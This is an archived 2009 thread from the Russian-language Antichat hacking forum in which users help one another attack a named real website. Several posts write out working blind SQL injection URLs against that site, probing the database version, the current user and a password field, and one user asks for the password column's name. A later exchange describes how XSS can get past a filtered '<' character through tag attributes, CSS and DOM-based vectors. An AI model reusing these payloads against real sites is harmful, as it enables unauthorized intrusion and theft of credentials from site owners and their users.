ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.10.2009, 11:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Это называется blind -sql -inj
то есть при правильном запросе у тебя выдаст страницу которая должна быть, при не правильном , в твоем случае , вообще ни чего.
то есть при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+ выдаст страницу , а при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=4+--+ ни чего не выводит,
|
|
|
23.10.2009, 11:59
|
|
Познающий
Регистрация: 15.01.2006
Сообщений: 45
Провел на форуме:
210499
Репутация:
16
|
|
Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.
|
|
|
|
23.10.2009, 12:01
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от DeluxeS
Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (
Всё просто, в текущей БД database нет таблицы tabla 
Сообщение от Patrik
Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.
_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+
Последний раз редактировалось DrAssault; 23.10.2009 в 12:05..
|
|
|
|
23.10.2009, 12:13
|
|
Познающий
Регистрация: 15.01.2006
Сообщений: 45
Провел на форуме:
210499
Репутация:
16
|
|
Сообщение от DrAssault
_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+
Получается строка user пустая. Где тогда искать?
|
|
|
|
23.10.2009, 12:31
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Patrik,
_http://forum.antichat.ru/thread119047.html , _https://forum.antichat.ru/threadnav35207-1-10.html
|
|
|
|
23.10.2009, 14:02
|
|
Познающий
Регистрация: 15.01.2006
Сообщений: 45
Провел на форуме:
210499
Репутация:
16
|
|
_http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100--
Пол царства за имя поля с паролем |
|
|
|
23.10.2009, 15:07
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
|
|
|
|
23.10.2009, 15:13
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Nightmarе
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
нет
|
|
|
|
23.10.2009, 15:23
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Nightmarе
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
Возможно, если XSS внутри тега, к примеру:
Код:
<a href="[XSS]">link</a>
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
23.10.2009, 15:51
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
в атрибутах тэгов, css-стилях, также не забываем про dom-based xss
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1620404){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1620900){kind=avatar}
Похожие темы
Линейный вид
